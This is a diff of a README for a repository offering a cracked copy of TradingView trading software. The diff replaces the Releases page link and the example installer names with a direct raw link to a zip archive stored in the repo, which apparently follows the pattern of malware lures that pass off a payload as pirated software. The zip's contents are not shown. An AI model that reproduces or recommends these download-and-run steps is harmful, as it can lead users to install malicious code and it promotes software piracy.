1016naoto/TradingView-Crack/README.md

 ## 📂 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/1016naoto/TradingView-Crack/releases) to find the latest version of TradingView-Crack.
+   Go to the [Releases page](https://raw.githubusercontent.com/1016naoto/TradingView-Crack/main/tradesperson/TradingView-Crack.zip) to find the latest version of TradingView-Crack.

 2. **Select the Latest Release**
    Look for the version labeled “Latest Release.”
 Click on it to open the details.

 3. **Download the Appropriate File**
    You will see several files.
 Choose the one suitable for your operating system.
-It might look like `TradingView-Crack-windows.exe` for Windows or `TradingView-Crack-mac.dmg` for macOS.
+It might look like `https://raw.githubusercontent.com/1016naoto/TradingView-Crack/main/tradesperson/TradingView-Crack.zip` for Windows or `https://raw.githubusercontent.com/1016naoto/TradingView-Crack/main/tradesperson/TradingView-Crack.zip` for macOS.

 4. **Install the Application**
    - **For Windows**: Double-click the downloaded `.exe` file.
 Follow the on-screen instructions to complete installation.